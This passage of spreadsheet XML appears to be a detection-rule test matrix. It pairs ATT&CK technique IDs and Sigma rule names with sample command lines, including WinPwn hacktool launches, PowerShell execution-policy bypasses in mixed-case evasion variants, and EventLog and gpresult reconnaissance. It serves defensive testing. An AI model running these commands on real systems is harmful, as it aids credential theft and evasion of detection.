      <c r="B1453" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_eventlog_content_recon</t>
        </is>
      </c>
      <c r="C1453" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious EventLog Recon Activity Using Log Query Utilities</t>
        </is>
      </c>
      <c r="D1453" s="36" t="inlineStr">
        <is>
          <t>beaa66d6-aa1b-4e3c-80f5-e0145369bfaf</t>
        </is>
      </c>
      <c r="E1453" s="36" t="inlineStr">
        <is>
          <t>powershell -Command "[System.Diagnostics.Eventing.Reader.EventLogReader]::new((New-Object System.Diagnostics.Eventing.Reader.EventLogQuery('Microsoft-Windows-TerminalServices-LocalSessionManager/Operational', [System.Diagnostics.Eventing.Reader.PathType]::LogName))).ReadEvent()"</t>
        </is>
      </c>
      <c r="F1453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1453" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1453" s="36" t="n"/>
      <c r="J1453" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1453" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1454" ht="15.75" customHeight="1" s="42">
      <c r="A1454" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1454" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1454" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1454" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1454" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1454" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G1454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1454" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1454" s="36" t="n"/>
      <c r="J1454" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1454" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1455" ht="15.75" customHeight="1" s="42">
      <c r="A1455" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1455" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1455" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1455" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1455" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1455" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1455" s="43" t="n"/>
      <c r="J1455" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1455" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1456" ht="15.75" customHeight="1" s="42">
      <c r="A1456" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1456" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1456" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1456" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1456" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1456" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1456" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1456" s="36" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1456" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1456" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1457" ht="15.75" customHeight="1" s="42">
      <c r="A1457" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1457" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1457" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1457" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1457" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1457" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1457" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1457" s="36" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1457" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1457" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1458" ht="15.75" customHeight="1" s="42">
      <c r="A1458" s="36" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1458" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1458" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1458" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1458" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1458" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1458" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1458" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1458" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1458" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1458" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1459" ht="15.75" customHeight="1" s="42">
      <c r="A1459" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1459" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1459" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1459" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1459" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1459" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1459" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1459" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1459" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1459" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1459" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1460" ht="15.75" customHeight="1" s="42">
      <c r="A1460" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B1460" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1460" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1460" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1460" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1460" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1460" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1460" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1460" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1460" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1460" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1461" ht="15.75" customHeight="1" s="42">
      <c r="A1461" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1461" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1461" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1461" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1461" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1461" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1461" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1461" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1461" s="43" t="n"/>
      <c r="J1461" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1461" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1462" ht="15.75" customHeight="1" s="42">
      <c r="A1462" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1462" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1462" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1462" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1462" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1462" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1462" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1462" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1462" s="43" t="n"/>
      <c r="J1462" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1462" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1463" ht="15.75" customHeight="1" s="42">
      <c r="A1463" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1463" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1463" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1463" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1463" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1463" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1463" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1463" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1463" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1463" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1463" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1464" ht="15.75" customHeight="1" s="42">
      <c r="A1464" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1464" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1464" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1464" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1464" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1464" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1464" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1464" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1464" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1464" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1464" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1465" ht="15.75" customHeight="1" s="42">
      <c r="A1465" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1465" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1465" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1465" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1465" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1465" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1465" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1465" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1465" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1465" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1465" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1466" ht="15.75" customHeight="1" s="42">
      <c r="A1466" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1466" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1466" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1466" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1466" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1466" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1466" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1466" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1466" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1466" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1466" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1467" ht="15.75" customHeight="1" s="42">
      <c r="A1467" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B1467" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1467" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1467" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1467" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1467" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1467" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1467" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1467" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1467" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1468" ht="15.75" customHeight="1" s="42">
      <c r="A1468" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1468" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1468" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1468" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1468" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F1468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1468" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1468" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1468" s="43" t="n"/>
      <c r="J1468" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1468" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1469" ht="15.75" customHeight="1" s="42">
      <c r="A1469" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1469" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1469" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1469" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1469" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F1469" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1469" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1469" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1469" s="43" t="n"/>
      <c r="J1469" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1469" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1470" ht="15.75" customHeight="1" s="42">
      <c r="A1470" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1470" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1470" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1470" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1470" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1470" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1470" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1470" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1470" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1470" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1471" ht="15.75" customHeight="1" s="42">
      <c r="A1471" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1471" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1471" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1471" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1471" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1471" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1471" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1471" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1472" ht="15.75" customHeight="1" s="42">
      <c r="A1472" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1472" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1472" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1472" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1472" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1472" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1472" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1472" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1472" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1472" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1473" ht="15.75" customHeight="1" s="42">
      <c r="A1473" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1473" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1473" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1473" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1473" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1473" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1473" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1473" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1473" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1474" ht="15.75" customHeight="1" s="42">
      <c r="A1474" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B1474" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C1474" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D1474" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E1474" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F1474" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1474" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1474" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1474" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1474" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1475" ht="15.75" customHeight="1" s="42">
      <c r="A1475" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1475" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1475" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1475" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1475" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c chcp .</t>
        </is>
      </c>
      <c r="F1475" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1475" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1475" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1475" s="43" t="n"/>
      <c r="J1475" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1475" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1476" ht="15.75" customHeight="1" s="42">
      <c r="A1476" s="43" t="inlineStr">
        <is>
          <t>t1614.001</t>
        </is>
      </c>
      <c r="B1476" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_chcp_codepage_lookup</t>
        </is>
      </c>
      <c r="C1476" s="43" t="inlineStr">
        <is>
          <t>Console CodePage Lookup Via CHCP</t>
        </is>
      </c>
      <c r="D1476" s="43" t="inlineStr">
        <is>
          <t>7090adee-82e2-4269-bd59-80691e7c6338</t>
        </is>
      </c>
      <c r="E1476" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "[Console]::OutputEncoding"</t>
        </is>
      </c>
      <c r="F1476" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1476" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1476" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1476" s="43" t="n"/>
      <c r="J1476" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1476" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1477" ht="15.75" customHeight="1" s="42">
      <c r="A1477" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1477" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1477" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1477" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1477" s="43" t="inlineStr">
        <is>
          <t>gpresult -z</t>
        </is>
      </c>
      <c r="F1477" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1477" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1477" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1477" s="43" t="n"/>
      <c r="J1477" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K1477" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1478" ht="15.75" customHeight="1" s="42">
      <c r="A1478" s="43" t="inlineStr">
        <is>
          <t>t1615</t>
        </is>
      </c>
      <c r="B1478" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_gpresult_execution</t>
        </is>
      </c>
      <c r="C1478" s="43" t="inlineStr">
        <is>
          <t>Gpresult Display Group Policy Information</t>
        </is>
      </c>
      <c r="D1478" s="43" t="inlineStr">
        <is>
          <t>e56d3073-83ff-4021-90fe-c658e0709e72</t>
        </is>
      </c>
      <c r="E1478" s="43" t="inlineStr">
        <is>
          <t>gpresult /h report.html /f</t>
        </is>
      </c>
      <c r="F1478" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1478" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1478" s="43" t="b">
